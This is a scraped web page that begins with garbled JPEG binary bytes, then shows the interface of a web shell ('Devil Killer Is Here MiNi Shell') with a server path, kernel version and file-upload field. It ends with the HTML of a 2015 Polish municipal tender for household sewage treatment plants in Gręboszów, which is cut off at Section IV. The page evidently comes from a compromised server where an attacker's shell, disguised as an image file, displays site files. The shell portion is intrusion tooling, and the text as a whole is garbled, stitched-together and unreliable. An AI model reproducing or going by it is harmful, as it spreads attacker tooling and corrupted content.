JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150202/14055-N-2015.html

<p class="kh_header"><b>Gręboszów: Budowa przydomowych oczyszczalni ścieków na terenie gminy Gręboszów</b><br>
<b>Numer ogłoszenia: 14055 - 2015; data zamieszczenia: 02.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Gręboszów , Gręboszów 144, 33-260 Gręboszów, woj. małopolskie, tel. 014 6416002, faks (014) 641 60 53.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.malopolska.pl/uggreboszow/Article/id,277574.html</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa przydomowych oczyszczalni ścieków na terenie gminy Gręboszów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest : Budowa przydomowych oczyszczalni ścieków na terenie gminy Gręboszów.
  2.  Zakres robót budowlanych obejmuje wykonanie oczyszczalni ścieków w następujących wariantach:  
Lp.	Wariant oczyszczalni	Ilość w sztukach
1)	4 RLM	  - 33 szt.
2)	4RLM + staw - 	2 szt.
3)	8 RLM	 - 19  szt.
4)	8RLM + staw  -	2 szt.
5)	12 RLM	-  1  szt. 
Razem	57 szt oczyszczalni.

 3.  Zamawiający zastrzega sobie  możliwość zmniejszenia zakresu przedmiotu zamówienia, jak wykazano w pkt 2,
      w przypadku rezygnacji osób  zainteresowanych budową  przydomowych oczyszczalni ścieków, tym samym 
      wysokość  wynagrodzenia Wykonawcy ulegnie zmniejszeniu. Wynagrodzenie Wykonawcy za wykonanie przedmiotu 
      zamówienia ustalone zostanie ostatecznie od ilości wykonanych oczyszczalni.
 4.   W ramach realizacji przedmiotu zamówienia Wykonawca:
      1)  dokona rozruchu technologicznego każdej wykonanej oczyszczalni.
      2)  indywidualnie przeszkoli użytkowników w zakresie obsługi urządzeń i instalacji  oczyszczalni i przekaże
            instrukcje obsługi dla wykonanych urządzeń i instalacji,
      3)  protokolarnie przekaże wykonane  oczyszczalnie  Zamawiającemu,
      4)  zapewni obsługę geodezyjną inwestycji przez uprawnione służby geodezyjne obejmującej wytyczenie obiektów 
           i inwentaryzację powykonawczą,
      5)  sporządzi  i przedłoży dokumentacje odbiorową  (w 2 egz.),
      6)  udzieli Zamawiającemu   na wykonany przedmiot umowy co najmniej  60 miesięcy gwarancji  i odpowiedzialności 
           z tytułu rękojmi  za  jakość wykonania  przedmiotu  zamówienia .
      7)  przeprowadzi  przeglądy gwarancyjne celem prawidłowego funkcjonowania oczyszczalni. Przegląd pierwszy 
           funkcjonowania oczyszczalni Wykonawca przeprowadzi po 12 miesiącach  gwarancji,  a  ostatni  w ostatnim  
           deklarowanym miesiącu  gwarancji.  Przeglądy gwarancyjne prowadzone będą w obecności  przedstawiciela 
           Wykonawcy,  i przedstawiciela Zamawiającego.  Stwierdzone wady urządzeń  Wykonawca usunie na własny koszt 
           w terminach  wskazanych  w protokołach  z wykonania przeglądu.
5. Szczegółowy opis przedmiotu zamówienia określa dokumentacja projektowa (zał. nr 12 do SIWZ),  stanowiąca  
     załącznik  do  niniejszej SIWZ, która jest dostępna w wersji elektronicznej na stronie internetowej Zamawiającego. 
6. Zestawienie robót planowanych do wykonania w ramach w/w zamówienia określają przedmiary robót  znajdujące się 
     w załączniku nr 12  do SIWZ , stanowiące materiał pomocniczy i informacyjny do sporządzenia wyceny.  
   7. Zamawiający zastrzega, że wszystkie ewentualnie podane w SIWZ opisy nazw własnych  materiałów  (wyrobów) , 
     wyposażenia w sprzęt nie mają na celu naruszenia art.29 i 7 ustawy Pzp, a mają jedynie za zadanie  sprecyzowanie 
     oczekiwań jakościowych i technologicznych Zamawiającego.  Należy rozumieć to jako  określenie wymaganych 
     minimalnych parametrów  użytkowych, funkcjonalnych i technicznych   lub standardów jakościowych.  Oznacza
     to,   że zgodnie  z art. 29 ustawy , na wskazane z nazwy materiały  (wyroby) i wyposażenie w  sprzęt Zamawiający 
     dopuszcza   zastosowanie  równoważnych  materiałów  i wyrobów o nie gorszych parametrach użytkowych, 
     funkcjonalnych i technicznych  niż   opisane w  załączniku do niniejszej SIWZ. Ciężar udowodnienia,  że materiał 
      (wyrób)  jest  równoważny w stosunku do  wymogu  określonego przez Zamawiającego spoczywa na  składającym   
     ofertę.  W takim przypadku  Wykonawca musi   przedłożyć odpowiednie dokumenty opisujące   parametry  
     techniczne, wymagane prawem  certyfikaty i inne  dokumenty dopuszczające dane materiały  (wyroby) do  
     użytkowania, oraz pozwalające   jednoznacznie  stwierdzić, że są one rzeczywiście równoważne.
  8. Do realizacji przedmiotu zamówienia Wykonawca zobowiązany jest stosować materiały i urządzenia posiadające 
     obowiązujące świadectwa dopuszczenia do stosowania w budownictwie: atesty, certyfikaty, deklaracje zgodności
     z polskimi normami.  Urządzenia muszą posiadać znak bezpieczeństwa CE. Jakość materiałów powinna odpowiadać 
     wymogom wyrobów  dopuszczonych do obrotu i stosowania w budownictwie (art.10 Prawa Budowlanego),
  9.  Transport materiałów na plac budowy oraz dostarczenie i eksploatacja maszyn i urządzeń obciążają Wykonawcę.
10.  Wszelkie roboty winny być prowadzone zgodnie ze sztuką budowlaną, przepisami prawa budowlanego, 
     obowiązującymi  polskimi normami oraz normami europejskimi o ile obowiązują w Polsce, przy zachowaniu 
     przepisów BHP, przy maksymalnym ograniczeniu uciążliwości prowadzonych robót.
11.  Do kierowania robotami budowlanymi przy realizacji przedmiotu zamówienia Wykonawca zobowiązany jest  zapewnić 
     osoby posiadające wymagane uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie 
     o specjalnościach:  instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych.  

12.  Do obowiązków Wykonawcy należeć będzie również:
     1)  organizowanie i zagospodarowanie terenu budowy,
     2)  zagospodarowanie odpadów zgodnie z Ustawą o odpadach z dnia 14.12.2014 (Dz.U. z 2013, 21 ze zm.)
     3) zabezpieczenie pomieszczeń socjalnych dla personelu Wykonawcy i podwykonawców,
     4) wykonanie niezbędnych  prób, badań, odbiorów,
     5) zapewnienie ochrony terenu budowy oraz znajdującego się na nim  mienia oraz warunków bezpieczeństwa,
     6) poniesienie kosztów odtworzenia uszkodzonych dróg, chodników,  zieleni, koszty zużycia wody, gazu, energii 
         elektrycznej na placu  budowy,    
     7) ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej
         z przedmiotem zamówienia na kwotę nie mniejszą niż 1,0 mln zł. Kopię aktualnej polisy ubezpieczeniowej lub inny 
        dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej zostanie przez 
        wybranego Wykonawcę przedłożone zostanie przed podpisaniem umowy.
     8)  i inne obowiązki wymienione w  projekcie umowy stanowiący załącznik  do SIWZ.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje możliwość udzielenia 
         zamówień uzupełniających do wysokości 50 % wartości zamówienia podstawowego (art.67 ust.1 pkt 6 ustawy Pzp.).</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.21-9, 45.11.12.00-8, 45.11.24.00-9, 45.23.24.60-4, 45.11.12.91-9, 45.31.51.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.    Zamawiający żąda od Wykonawców  wniesienie wadium  przetargowego w kwocie 15 000,00 zł, 
           słownie: piętnaście  tysięcy  złotych, które winno być wniesione  przed upływem terminu składania ofert.
    2.    Wadium może być wniesione w jednej  lub w kilku  następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym 
że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z 9 listopada 2000 r. 
o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. nr 109, poz. 1158 ze zm.).  W przypadku wnoszenia przez Wykonawcę wadium w formie określonej w ust.2 pkt 2-5 zobowiązany 
           jest on dostarczyć Zamawiającemu oryginał właściwego dokumentu poręczenia lub gwarancji przed 
           upływem  terminu składania ofert i złożyć go w siedzibie Zamawiającego w pokoju nr 11 - sekretariat, 
           a do  oferty  dołączyć kopię przedmiotowego dokumentu potwierdzoną za zgodność z oryginałem przez 
           Wykonawcę. 
           Wymagana ważność wadium w formach innych niż pieniężna  minimum - 30 dni od daty 
           składania ofert. Składane przez Wykonawcę wadium w formie niepieniężnej  musi się powoływać w swej 
           treści na przepis   art. 46 ust. 5 ustawy Pzp i być bezwarunkowe, nieodwołalne i płatne na pierwsze pisemne 
           żądanie Zamawiającego.  
    Wniesienie wadium w innej, niż wyżej wskazanej formie zaskutkuje uznaniem iż oferta Wykonawcy nie 
           jest właściwie  zabezpieczona   wadium, a Zamawiający będzie musiał wykluczyć takiego Wykonawcę 
           z postępowania na podstawie art. 24 ust.2 pkt 2 ustawy Pzp</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań  w zakresie spełniania tego warunku. Wykonawca potwierdza 
        spełnianie warunku poprzez złożenie oświadczenia  (wzór oświadczenia - załącznik nr  2 do SIWZ). Ocena 
        spełnienia tego warunku zostanie dokonana na podstawie oświadczenia złożonego  przez Wykonawcę,  
        na  zasadzie  spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że zrealizował (zakończył)  (zgodnie ze  wspólnym słownikiem zamówień CPV 
        45.23.24.21-9 - Roboty w zakresie oczyszczania ścieków) w jednym zamówieniu (robocie budowlanej): co 
        najmniej 30  szt przydomowych oczyszczalni ścieków  lub wykonał przydomowe oczyszczalnie ścieków o wartości
        co najmniej 600 tys. zł brutto,  lub  wykonał oczyszczalnię ścieków o wartości co najmniej 600 tys. zł brutto,  
        i  które zostały  wykonane w okresie  ostatnich 5 lat przed  upływem terminu  składania   ofert,  a jeżeli okres  prowadzenia 
        działalności   jest krótszy  -  w tym  okresie,  z podaniem  ich rodzaju  i wartości, daty   i miejsca wykonania oraz 
        załączeniem dowodów   dotyczących,  czy roboty te zostały wykonane  w sposób  należyty  oraz wskazujących, czy zostały  
        wykonane   zgodnie z zasadami sztuki budowlanej  i prawidłowo  ukończone.  
        Dowodami są poświadczenia lub inne  dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym  charakterze 
        wykonawca nie jest w stanie uzyskać  poświadczenia (wzór wykazu robót  - załącznik nr  4  do SIWZ).
                      Wartości robót podane w dokumentach w walutach innych niż wskazane przez Zamawiającego powinny przez     
Wykonawcę przeliczone według średniego kursu NBP na dzień przed złożeniem  ofert. Wykonawcy wspólnie     
                    ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają w/w  wymagania.
        Ocena spełnienia tego warunku zostanie dokonana na podstawie dokumentów złożonych przez Wykonawcę, 
        na  zasadzie  spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań  w zakresie spełniania tego warunku. Wykonawca potwierdza 
         spełnianie warunku poprzez złożenie oświadczenia  (wzór oświadczenia - załącznik nr  2 do SIWZ). Ocena 
         spełnienia tego warunku zostanie dokonana na podstawie oświadczenia złożonego  przez Wykonawcę,  
         na  zasadzie  spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje  lub dysponować będzie do realizacji zamówienia osobą, która będzie 
         pełnić funkcję kierownika budowy,   posiadającą  uprawnienia budowlane    do wykonywania samodzielnych 
         funkcji technicznych w budownictwie w specjalnościach instalacyjnej w zakresie sieci wodociągowych 
         i kanalizacyjnych,  wpisaną do właściwej    izby samorządu  zawodowego, posiadającą aktualne ubezpieczenie 
         od   odpowiedzialności cywilnej.    
         Zamawiający,    określając wymogi dla  osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza 
         odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących 
         przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru  Gospodarczego
         oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12 a oraz innych przepisów ustawy  Prawo budowlane (tekst  
         jednolity. Dz.U. z 2006 r. nr 156, poz. 1118 ze zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych  
         nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008 r.  nr 63, poz. 394). 
         Wykonawca potwierdza  spełnianie warunku poprzez złożenie wykazu osób, które będą uczestniczyć w wykonaniu 
         zamówienia. (wzór  - załącznik nr  5 do SIWZ) i złożenie oświadczenia, że osoby, które będą uczestniczyć 
         w wykonywaniu zamówienia posiadają wymagane uprawnienia (wzór - załącznik nr 6 do SIWZ).
         Ocena  spełnienia tego warunku zostanie dokonana na podstawie  dokumentów złożonych przez  Wykonawcę,  
         na  zasadzie  spełnia /nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia  w tym zakresie szczególnych wymagań,  w zakresie spełniania tego warunku. 
         Wykonawca potwierdza  spełnianie warunku poprzez złożenie oświadczenia  (wzór oświadczenia - załącznik nr  2 
         do SIWZ). Ocena  spełnienia tego warunku zostanie dokonana na podstawie oświadczenia złożonego  przez 
         Wykonawcę,  na  zasadzie  spełnia /nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca musi wykazać, że zrealizował (zakończył)  (zgodnie ze  wspólnym słownikiem zamówień CPV 
        45.23.24.21-9 - Roboty w zakresie oczyszczania ścieków) w jednym zamówieniu (robocie budowlanej): co 
        najmniej 30  szt przydomowych oczyszczalni ścieków  lub wykonał przydomowe oczyszczalnie ścieków o wartości
        co najmniej 600 tys. zł brutto,  lub  wykonał oczyszczalnię ścieków o wartości co najmniej 600 tys. zł brutto,  
        i  które zostały  wykonane w okresie  ostatnich 5 lat przed  upływem terminu  składania   ofert,  a jeżeli okres  prowadzenia 
        działalności   jest krótszy  -  w tym  okresie,  z podaniem  ich rodzaju  i wartości, daty   i miejsca wykonania oraz 
        załączeniem dowodów   dotyczących,  czy roboty te zostały wykonane  w sposób  należyty  oraz wskazujących, czy zostały  
        wykonane   zgodnie z zasadami sztuki budowlanej  i prawidłowo  ukończone.  
        Dowodami są poświadczenia lub inne  dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym  charakterze 
        wykonawca nie jest w stanie uzyskać  poświadczenia (wzór wykazu robót  - załącznik nr  4  do SIWZ);</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)  Formularz ofertowy (wzór -  załącznik nr 1 do SIWZ).
       2)  Kosztorys ofertowy (opis  sporządzenia w rozdziale  X SIWZ). W kosztorysie ofertowym należy wskazać  
             podstawę  wyceny,  opis pozycji,  ilość  robót, cenę jednostkową pozycji, wartość  pozycji,  zestawienie  
            ilościowe i wartościowe robocizny,  materiałów, pracy sprzętu,  stawkę roboczogodziny i pracy sprzętu, 
            procentowe narzuty kosztów ogólnych, koszty  zakupu i zysku, tabelę elementów scalonych.
       3)  Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o zamówienie publiczne albo 
            do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w przypadku 
            gdy umocowanie takie nie wynika ze złożonego odpisu z właściwego rejestru albo zaświadczenia o wpisie 
            do ewidencji działalności gospodarczej.
       4)  Oryginał gwarancji lub poręczenia, jeśli wadium wnoszone jest w innej formie niż pieniądz w sposób określony 
            w rozdziale VIII pkt 5 SIWZ</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
